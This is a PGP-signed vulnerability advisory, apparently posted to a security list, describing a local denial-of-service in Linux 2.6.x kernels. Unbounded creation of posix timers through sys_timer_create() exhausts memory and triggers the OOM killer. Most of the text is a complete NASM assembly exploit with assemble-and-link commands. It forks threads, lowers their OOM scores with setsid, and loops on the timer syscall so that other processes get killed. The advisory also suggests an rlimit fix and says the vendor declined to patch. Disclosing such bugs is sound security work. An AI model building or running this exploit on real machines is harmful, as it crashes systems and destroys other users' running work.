-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello. I'd like to present one of Linux Kernel vulnerabilities. As far as I know, this one affects 2.6.x kernels. Problem - -- The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c. Each time user creates a posix timer, some kernel memory is allocated. Since count of timers that can be created by user is limited only by sigqueue size (ex. 4294967295 in Debian) every local user can exhaust all avaible memory which will trigger oom_killer (mm/oom_kill.c). If a process itself uses a small amount of memory, it's oom_score will be low, so all other processes would be killed. Exploit - -- - --------------8<--------------------- ;nasm -f elf noHeaven.asm ;ld -s -o noHeaven noHeaven.o section .text global _start count equ 8 ; threads count - do it quicker _start: mov ebx, count call create_threads jmp done _pause: mov eax,29 int 0x80 ret create_threads: mov eax,2 int 0x80 test eax,eax jz consume dec ebx test ebx,ebx jnz create_threads ret consume: setsid: ; so we won't get counted as one thread in oom_killer() xor ebx,ebx ; each task will have about 20 oom_score which mov eax,66 ; is less than 'init' and others int 0x80 push eax loopek: mov eax,259 mov ebx,0 mov ecx,0 mov edx,esp int 0x80 jmp loopek done: xor ebx,ebx mov eax,1 int 0x80 - --------------8<-------------------- Fix - -- In my opinion the easiest way to defend is to enforce pending signals queue size rlimit (ulimit -i). Vendor notification status - -- Vendor refused to fix this kind of bugs. - -- Regards, fingerout -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEMwAY3AGvlpYpo4cRApESAJ9PPyZaHz5HExrh15pQdH51I3di+wCfee87 hqrfQZpKiyqugdZoabAHy9g= =9y9Y -----END PGP SIGNATURE-----